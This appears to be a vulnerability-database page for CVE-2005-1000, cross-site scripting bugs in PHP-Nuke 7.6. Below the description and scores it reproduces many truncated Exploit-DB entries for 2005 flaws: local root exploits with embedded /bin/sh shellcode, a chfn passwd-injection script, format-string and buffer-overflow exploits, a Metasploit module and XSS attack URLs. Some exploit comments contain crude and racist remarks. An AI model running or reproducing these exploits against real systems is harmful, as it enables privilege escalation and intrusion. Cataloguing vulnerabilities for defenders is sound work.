CVE-2005-1000
published 2005-05-02CVE-2005-1000: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 7.6 allow remote attackers to inject arbitrary web script or HTML via (1) the bid parameter to…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.76%
75.3th percentile
Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 7.6 allow remote attackers to inject arbitrary web script or HTML via (1) the bid parameter to the EmailStats op in banners.pgp, (2) the ratenum parameter in the TopRated and MostPopular actions in the Web_Links module, (3) the ttitle parameter in the viewlinkdetails, viewlinkeditorial, viewlinkcomments, and ratelink actions in the Web_Links module, or (4) the username parameter in the Your_Account module.
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
| francisco_burzi | php-nuke | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mrv4-qgw7-rp76: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 7
ghsa_unreviewed·2022-05-01
CVE-2005-1000 [MEDIUM] GHSA-mrv4-qgw7-rp76: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 7
Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 7.6 allow remote attackers to inject arbitrary web script or HTML via (1) the bid parameter to the EmailStats op in banners.pgp, (2) the ratenum parameter in the TopRated and MostPopular actions in the Web_Links module, (3) the ttitle parameter in the viewlinkdetails, viewlinkeditorial, viewlinkcomments, and ratelink actions in the Web_Links module, or (4) the username parameter in the Your_Account module.
GHSA
GHSA-355j-f2rj-3mv5: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2005-1023 [MEDIUM] GHSA-355j-f2rj-3mv5: Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6
Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.x to 7.6 allow remote attackers to inject arbitrary web script or HTML via the (1) min parameter to the Search module, (2) the categories parameter to the FAQ module, or (3) the ltr parameter to the Encyclopedia module. NOTE: the bid parameter issue in banners.php is already an item in CVE-2005-1000.
No detection rules found.
Exploit-DB
Linux chfn (SuSE 9.3/10) - Local Privilege Escalation
exploitdb·2005-11-08
CVE-2005-3503 Linux chfn (SuSE 9.3/10) - Local Privilege Escalation
Linux chfn (SuSE 9.3/10) - Local Privilege Escalation
---
#!/bin/sh
#
# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
#
# by Hunger
#
# Advistory:
# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html
#
# hunger@suse:~> id
# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
# hunger@suse:~> ./susechfn.sh
# Type your current password to get root... :)
# Password:
# sh-2.05b# id
# uid=0(r00t) gid=0(root) groups=0(root)
if [ X"$SHELL" = "X" ]; then
echo "No SHELL environment, using /bin/sh for default."
export SHELL=/bin/sh
fi
if [ -u /usr/bin/chfn ]; then
/bin/echo "Type your current password to get root... :)"
/usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/n
Exploit-DB
gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String
exploitdb·2005-11-04
CVE-2005-3523 gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String
gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String
---
#!/usr/bin/perl -w
#
# Code by KF, although it is most likely ripped from John H.
# (kf_lists[at]digital_munition[dot]com)
#
# http://www.digitalmunition.com
#
# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles.
# Free 14 day Testicle licking trial available!
#
# friendsd.c:367: fprintf (stderr, txt);
#
# Tested on intel using gpsdrive_2.09-2_i386.deb
#
# kfinisterre@animosity:~$ telnet localhost 5074
# Trying 127.0.0.1...
# Connected to animosity
# Escape character is '^]'.
# id;
# uid=1000(kfinisterre) gid=1000(kfinisterre) groups=1000(kfinisterre)
# : command not found
#
# [email protected]
# x86 portbind a shell in port 5074
# 92 bytes.
#
# This shit is NOT robust and most likely will NOT work on kernel 2.
Exploit-DB
Asus VideoSecurity Online 3.5 - Web Server Authentication Buffer Overflow
exploitdb·2005-11-02
CVE-2005-3489 Asus VideoSecurity Online 3.5 - Web Server Authentication Buffer Overflow
Asus VideoSecurity Online 3.5 - Web Server Authentication Buffer Overflow
---
/*
source: https://www.securityfocus.com/bid/15279/info
Asus VideoSecurity Online is prone to a buffer overflow in the authentication mechanism of the included Web server. This issue only exists if authentication is enabled on the Web server.
The Web server included with Asus VideoSecurity Online is not enabled by default.
This vulnerability is reported to affect Asus VideoSecurity Online 3.5.0 and earlier.
*/
/* by Luigi Auriemma */ #include #include #include
#ifdef WIN32
#include
#include "winerr.h"
#define close closesocket
#define ONESEC 1000 #else
#include
#include
#include
#include
#include
#include
#define ONESEC 1 #endif #define VER "0.1" #define PORT 80 #define
BUFFSZ 8192 #define BOFSZ 2700 u_char
Exploit-DB
GNU Mailutils imap4d 0.6 - 'Search' Remote Format String
exploitdb·2005-09-10
CVE-2005-2878 GNU Mailutils imap4d 0.6 - 'Search' Remote Format String
GNU Mailutils imap4d 0.6 - 'Search' Remote Format String
---
/*
* GNU Mailutils 0.6 imap4d 'search' format string exploit.
* Ref: www.idefense.com/application/poi/display?id=303&type=vulnerabilities
*
* This silly exploit uses hardcoded values taken from GNU/Debian testing (etch).
*
* $ ./imap4d_search_expl -h 127.0.0.1 -p 143 -u clem1 -s PROUT
* [+] GNU Mailutils 0.6 imap4d 'search' format string exploit.
* [+] By clem1.
* [+] connecting to: 127.0.0.1:143
* [+] authentification: completed.
* [+] format string: sended
* [+] shellcode sended.
* [+] Bingo.
*
* id;
* uid=1000(clem1) gid=1002(mail) groups=0(root)
*
* Copyright (C) 2005 Clement Lecigne - clem1 @ badcode.info.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struc
Exploit-DB
Indiatimes Messenger 6.0 - Remote Buffer Overflow
exploitdb·2005-08-31
CVE-2005-2844 Indiatimes Messenger 6.0 - Remote Buffer Overflow
Indiatimes Messenger 6.0 - Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/14705/info
Indiatimes Messenger is reported prone to a remote buffer overflow vulnerability.
A successful attack may trigger a crash in the client or lead to arbitrary code execution. The attacker may then gain unauthorized remote access in the context of the user running the application.
Indiatimes Messenger 6.0 is affected by this issue.
[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";
for(i=0; i<1000; i++)
{
buf += "A";
}
while(obj1.GetServerStatus() != "Logged In"); //wait
till login
obj1.RenameGroup("Friends", buf, 5);
[/script]
Exploit-DB
Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution
exploitdb·2005-07-13
CVE-2005-2262 Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution
Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution
---
// Exploit by Michael Krax
Firewalling - Proof-of-Concept
function stopload() {
// in some cases the javascript url never stops to load
// therefore we force a stop after the real image got loaded
window.setTimeout("window.stop()",1000);
}
Firewalling - Proof-of-Concept
The "Set As Wallpaper" dialog takes the image url as a parameter without validating it.
This allows to execute javascript in chrome and to run arbitrary code.
By using absolute positioning and the moz-opacity filter an attacker can easily fool the
user to think he is setting a valid image as wallpaper.
Right click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch file
tha
Exploit-DB
Apple Mac OSX 10.4 - launchd Race Condition
exploitdb·2005-06-14
CVE-2005-1725 Apple Mac OSX 10.4 - launchd Race Condition
Apple Mac OSX 10.4 - launchd Race Condition
---
/*
* Mac OS X 10.4 launchd race condition exploit
*
* intropy (intropy caughq.org)
*/
/* .sh script to help with the offsets /str0ke
#!/bin/bash
X=1000
Y=3000
I=1
while ((1))
do
./CAU-launchd /etc/passwd $X
if [ $I -lt 30 ]
then
((X=$X+$Y))
((I=$I+1))
else
X=1000
I=1
fi
done
*/
#include
#include
#include
#include
#include
#include
#define DEBUG 0
#define SLEEP 6000
main(int argc, char *argv[])
{
pid_t pid;
int count, sleep = SLEEP;
char name[100];
char target[100];
struct stat *stats = (struct stat *)malloc(sizeof(struct stat));
if ( argc \n", argv[0]);
exit(-1);
} else if ( argc > 2 ) {
sleep = atoi(argv[2]);
strncpy(target, argv[1], sizeof(target)-1);
} else {
strncpy(target, argv[1], sizeof(target)-1);
}
if ( DEBUG ) printf("Goin
Exploit-DB
ARPUS/Ce - Local Overflow (setuid)
exploitdb·2005-05-01
CVE-2005-1396 ARPUS/Ce - Local Overflow (setuid)
ARPUS/Ce - Local Overflow (setuid)
---
#!/usr/bin/perl -w
#
# Setuid ARPUS/ce exploit by KF - kf_lists[at]digitalmunition[dot]com - 4/21/05
#
# Copyright Kevin Finisterre
# kfinisterre@threat:/tmp$ ./ce_ex.pl
# sh-2.05b# id
# uid=0(root) gid=1000(kfinisterre)
# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),1000(kfinisterre)
#
# 57 bytes long
$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";
$buf = "\x90" x (4120-569);
$buf .= $sc;
$buf .= (pack("l",(0xbfffa187)) x2);
$ENV{"XAPPLRESLANGPATH"} = $buf;
exec("/usr/bin/ce");
# milw0rm.com [2005-05-01]
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)
exploitdb·2005-04-12
CVE-2005-1099 Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)
Salim Gasmi GLD (Greylisting Daemon) 1.0 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the Salim Gasmi
GLD '$Revision$',
'Author' => [ 'patrick' ],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20=",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(2525)
],
self.class
)
end
def exploit
connect
sploit = "sender="+ payload.encoded + "\r\n"
sploit << "client_address=" + [
Exploit-DB
PHP-Nuke 7.6 - 'banners.php' Cross-Site Scripting
exploitdb·2005-04-06
CVE-2005-1000 PHP-Nuke 7.6 - 'banners.php' Cross-Site Scripting
PHP-Nuke 7.6 - 'banners.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/13026/info
PHP-Nuke is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/[php-nuke]/banners.php?op=EmailStats&name=sex&bid=[XSS]
Exploit-DB
PHP-Nuke 7.6 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2005-04-06
CVE-2005-1000 PHP-Nuke 7.6 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities
PHP-Nuke 7.6 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/13025/info
PHP-Nuke is reportedly affected by multiple cross-site scripting vulnerabilities in the Web_Links Module. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=TopRated&ratenum=[XSS]&ratetype=num
http://www.example.com/[php-nuke]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=%3Ch1%3E50&ratetype=num
http://www.example.com/[php-nuk
Exploit-DB
PHP-Nuke 6.x/7.x Your_Account Module - 'Username' Cross-Site Scripting
exploitdb·2005-04-05
CVE-2005-1000 PHP-Nuke 6.x/7.x Your_Account Module - 'Username' Cross-Site Scripting
PHP-Nuke 6.x/7.x Your_Account Module - 'Username' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/13007/info
It is reported that the PHP-Nuke 'Your_Account' module is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
This problem presents itself when malicious HTML and script code is sent to the application through the 'username' parameter of the 'Your_Account' module.
This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for t
Exploit-DB
PHP-Nuke 6.x/7.x Your_Account Module - Avatarcategory Cross-Site Scripting
exploitdb·2005-04-05
CVE-2005-1000 PHP-Nuke 6.x/7.x Your_Account Module - Avatarcategory Cross-Site Scripting
PHP-Nuke 6.x/7.x Your_Account Module - Avatarcategory Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/13010/info
It is reported that the PHP-Nuke 'Your_Account' module is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
This problem presents itself when malicious HTML and script code is sent to the application through the 'Avatarcategory' parameter of the 'Your_Account' module.
This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may a
Exploit-DB
Aeon 0.2a - Local Linux (2)
exploitdb·2005-04-05
CVE-2005-1019 Aeon 0.2a - Local Linux (2)
Aeon 0.2a - Local Linux (2)
---
/* first release /str0ke */
/*
local linux exploit within aeon-0.2a
Coded by patr0n (security-tmp.h14.ru)
*/
#define BUFLEN 533
#define PATH "/home/research/aeon-0.2a/aeon"
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
int main(int argc, char *argv[]) {
char evilbuf[BUFLEN];
int i;
char *p,*av[2], *ev[3];
char *egg;
egg=(char *)malloc(1000);
sprintf(egg, "EGG=");
memset(egg + 4, 0x90, 1000-1-strlen(shellcode));
sprintf(egg + 4 + 1000-1-strlen(shellcode), "%s", shellcode);
long ret=0xbfffffff-5-strlen(egg)-strlen(PATH);
p=evilbuf;
bzero(evilbuf,sizeof(evilbuf));
strcpy(evilbuf,"HOME=");
for(i=
Exploit-DB
ELOG 2.5.6 - Remote Shell
exploitdb·2005-02-09
CVE-2005-0439 ELOG 2.5.6 - Remote Shell
ELOG 2.5.6 - Remote Shell
---
/* Worked on latest version for me
* http://midas.psi.ch/elog/download/tar/elog-latest.tar.gz
* elog-latest.tar.gz 26-Jan-2005 21:36 519K
* Default port 8080.
* str0ke */
/*
Hi there, someone has brought to u a gift.
ELOG Remote Shell Exploit
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define _GNU_SOURCE
#define CONTSIZE 10000
#define BOUNSIZE 100
#define REQUESTSIZE 2000
#define INBUF 5000
#define LINEBUFSIZ 1000
#define GETBUFSIZE 10000
#define SENDBUFSIZE 10000
#define TIMEOUT 30
#define ENURLSIZE 200
#define GLOBATTSIZE 200
#define STORESIZE 10000
#define ELOGPORT 8080
#define SHBUFSIZE 288
#define BIGBUFSIZE 5000
#define BACKDOOR 31337
#define BSDBAC
Exploit-DB
Setuid perl - 'PerlIO_Debug()' Local Overflow
exploitdb·2005-02-07
CVE-2005-0156 Setuid perl - 'PerlIO_Debug()' Local Overflow
Setuid perl - 'PerlIO_Debug()' Local Overflow
---
/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* Tested on Debian 3.1 perl-suid 5.8.4-5
*
* (11:07:20) *corezion:* who is tha man with tha masta plan?
* (11:07:36) *corezion:* a nigga with a buffer overrun
* (11:07:39) *corezion:* heh
* (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* kfinisterre@jdam:~$ ./ex_perl2
* Dirlen: 1052
* Charlie Murphy!!!@#@
* sh-2.05b# id
* uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
*
*/
#include
#include
#include
#include
#include
#include
#include
int main(int *argc, char **argv)
{
int len = 23;
int count = 5;
char malpath[10000];
char tmp[256];
char *filler;
char *ptr;
unsigned ch
http://archives.neohapsis.com/archives/bugtraq/2005-04/0037.htmlhttp://marc.info/?l=bugtraq&m=111263454308478&w=2https://exchange.xforce.ibmcloud.com/vulnerabilities/19952http://archives.neohapsis.com/archives/bugtraq/2005-04/0037.htmlhttp://marc.info/?l=bugtraq&m=111263454308478&w=2https://exchange.xforce.ibmcloud.com/vulnerabilities/19952
2005-05-02
Published